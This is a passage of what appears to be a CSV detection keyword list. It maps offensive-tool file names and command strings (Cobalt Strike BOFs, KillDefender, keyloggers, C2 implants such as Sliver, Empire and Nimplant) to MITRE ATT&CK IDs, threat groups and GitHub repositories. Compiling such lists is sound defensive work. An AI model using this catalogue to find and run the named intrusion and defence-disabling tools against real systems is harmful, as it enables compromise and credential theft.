- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x86.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x86.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*Kevin-Robertson/Inveigh*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*keychain2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*keylistattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*keylog_dump*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*keylog_dump*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*keylog_inject *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*keylog_inject.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*keylog_off*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*keylog_on*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*keylog_recorder.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*keylog_recorder.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*keylog_start*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*keylog_stop*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*keylogger dump*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,0,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*keylogger is already off*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*keylogger stopped*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Keylogger*,offensive_tool_keyword,keylogger keyword,keylogger keyword. could be related to keylooger tools ,T1056.001 ,TA0006,N/A,N/A,POST Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Keylogger.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Keylogger.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Keylogger.pdb*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Keylogger.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*keylogger.py*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*keylogrecorder.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*keylooger.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*keyring2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*keyscan dump*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*keyscan start*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*keyscan stop*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*keystore2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*KeyTabExtract*,offensive_tool_keyword,KeyTabExtract,KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash,T1003 - T1552.004 - T1110 - T1210,TA0006 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/sosdave/KeyTabExtract,1,0,N/A,N/A,2,145,36,2020-08-26T01:03:37Z,2019-03-18T15:00:14Z -*keyword_obfuscation*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*kgretzky*,offensive_tool_keyword,Github Username,username Kuba Gretzky hosting sniffing and spoofing exploitation tools,N/A,N/A,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kgretzky/evilqr*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*kgretzky/pwndrop*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*kh4sh3i/Spring-CVE*,offensive_tool_keyword,POC,POC exploit for CVE-2022-22963,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/kh4sh3i/Spring-CVE,1,1,N/A,N/A,1,13,7,2022-03-31T20:58:54Z,2022-03-31T20:19:51Z -*khast3x*,offensive_tool_keyword,Github Username,Red team exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/khast3x,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*khast3x/h8mail*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,1,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*Kicking off download cradle in a new process*,offensive_tool_keyword,empire,empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*kick-operator -n *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*killAllNimplants*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*killav.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*killdefender check*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,0,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*killdefender kill*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,0,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*KillDefender.h*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,1,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*KillDefender.x64*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*KillDefender.x64.*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KillDefender_BOF,1,1,N/A,10,10,50,16,2022-06-28T15:54:15Z,2022-02-11T07:03:59Z -*KillDefender_BOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of pwn1sher's KillDefender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 